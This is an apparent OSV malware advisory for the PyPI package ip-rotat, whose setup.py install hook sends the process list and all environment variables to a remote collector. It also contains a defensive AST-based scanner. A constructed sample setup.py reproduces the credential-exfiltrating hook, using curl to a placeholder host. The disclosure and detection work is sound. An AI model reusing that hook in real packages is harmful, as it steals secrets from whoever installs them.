ip-rotat @0.0.1

Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC

Malicious

OSV ID

MAL-2026-6280

Ecosystem

pypi

Summary

On pip install or pip download, setup.py registers overridden install and egg_info cmdclass entries. Their run methods execute ps -elf to capture the host's full process listing, URL-encode every key/value pair of os.environ into a request body, and POST the combined payload via curl to http://gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun over plaintext HTTP. Because egg_info runs during metadata generation, the payload fires on pip download of the sdist as well as on install. Bulk environment scraping at install time leaks any CI/CD secrets present in the environment (AWS keys, GitHub/npm/PyPI tokens, etc.) together with a system-wide process listing. The package ships no ip-rotation functionality at all: setup.py contains only the exfiltration payload, the package name ip_rotat is a truncated form of ip-rotator-style library names, and the README references the this_is_fine_wuzzi install-time-code-execution PoC. The combination of name confusion, zero advertised functionality, and an automatic install-time exfiltration hook makes this a supply-chain attack against anyone who installs it. Resolving dependencies as wheels only (pip's --only-binary=:all:) avoids executing setup.py and is the simplest guard against this class of hook.
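
The indicators in this report (cmdclass overrides for install/egg_info, a shell-out to ps and curl, a full read of os.environ, a plaintext http:// collector) can be turned into a pre-install static check. The script below is an added example, not code from the advisory or from Amazon Inspector: it parses a setup.py with Python's ast module, resolves the classes registered under setup(cmdclass=...), and reports those whose bodies (or module-level helpers they call) spawn processes, read os.environ, or embed an http:// URL. HOOKED_COMMANDS and SHELL_CALLS are my own lists, and both setup.py texts are constructed for the demonstration; the collector URL http://collector.invalid/x is a placeholder, not the one named in the report.

```python
"""Heuristic check for exfiltrating cmdclass hooks in a setup.py (added example, see lead-in)."""
import ast

# setuptools commands that pip triggers during install or metadata generation (assumed list).
HOOKED_COMMANDS = {"install", "egg_info", "develop", "build_py", "sdist", "bdist_wheel"}
# Call targets that spawn a process (assumed list; extend as needed).
SHELL_CALLS = {"os.system", "os.popen", "subprocess.run", "subprocess.Popen",
               "subprocess.call", "subprocess.check_call", "subprocess.check_output"}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def _cmdclass_entries(tree):
    """Yield (command, class_name) pairs from setup(cmdclass={...})."""
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Call) and _dotted_name(node.func) in ("setup", "setuptools.setup")):
            continue
        for kw in node.keywords:
            if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                for key, value in zip(kw.value.keys, kw.value.values):
                    cls = _dotted_name(value)
                    if isinstance(key, ast.Constant) and isinstance(key.value, str) and cls:
                        yield key.value, cls

def _signals(node, module_funcs, seen):
    """Collect exfil indicators under node, following calls into module-level helpers once each."""
    found = set()
    for n in ast.walk(node):
        if isinstance(n, ast.Call):
            target = _dotted_name(n.func)
            if target in SHELL_CALLS:
                found.add("shell:" + target)
            elif target in module_funcs and target not in seen:
                seen.add(target)
                found |= _signals(module_funcs[target], module_funcs, seen)
        elif isinstance(n, ast.Attribute) and _dotted_name(n) == "os.environ":
            found.add("reads os.environ")
        elif isinstance(n, ast.Constant) and isinstance(n.value, str):
            if n.value == "curl":
                found.add("shell:curl")
            if n.value.startswith("http://"):
                found.add("plaintext-http:" + n.value)
    return found

def scan_setup_py(source):
    """Return {command: sorted indicators} for each hooked command whose class looks like exfil."""
    tree = ast.parse(source)
    classes = {n.name: n for n in ast.walk(tree) if isinstance(n, ast.ClassDef)}
    module_funcs = {n.name: n for n in tree.body if isinstance(n, ast.FunctionDef)}
    findings = {}
    for command, cls_name in _cmdclass_entries(tree):
        cls = classes.get(cls_name.rsplit(".", 1)[-1])
        if cls is not None and command in HOOKED_COMMANDS:
            indicators = _signals(cls, module_funcs, set())
            if indicators:
                findings[command] = sorted(indicators)
    return findings


# Constructed sample mirroring the hook the report describes; the collector URL is a placeholder.
MALICIOUS_SETUP = '''
import os, subprocess, urllib.parse
from setuptools import setup
from setuptools.command.install import install
from setuptools.command.egg_info import egg_info
def _exfil():
    ps = subprocess.check_output(["ps", "-elf"]).decode(errors="replace")
    body = urllib.parse.urlencode({"ps": ps, **os.environ})
    subprocess.run(["curl", "-s", "-X", "POST", "--data", body, "http://collector.invalid/x"])
class HookedInstall(install):
    def run(self):
        _exfil()
        install.run(self)
class HookedEggInfo(egg_info):
    def run(self):
        _exfil()
        egg_info.run(self)
setup(name="ip_rotat", version="0.0.1",
      cmdclass={"install": HookedInstall, "egg_info": HookedEggInfo})
'''

# Constructed benign sample: a build_py override that only writes a version file.
BENIGN_SETUP = '''
from setuptools import setup
from setuptools.command.build_py import build_py
class BuildWithVersion(build_py):
    def run(self):
        with open("VERSION", "w") as fh:
            fh.write("1.0")
        build_py.run(self)
setup(name="example-pkg", version="1.0", cmdclass={"build_py": BuildWithVersion})
'''
```

Run scan_setup_py over the setup.py of a downloaded sdist before building it; any non-empty result is worth a manual look. The check is deliberately narrow: it only follows helpers defined in the same file, so a hook that imports its payload from a sibling module, uses a PEP 517 build backend hook instead of cmdclass, or obfuscates the URL will slip past it. Treat it as a triage aid beside a wheel-only install policy, not as a replacement for one.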

Source: amazon-inspector (e85ab2724beee13bb6c2658c5bf5d50069c83619f062d39935226ff1fee1c0a3)
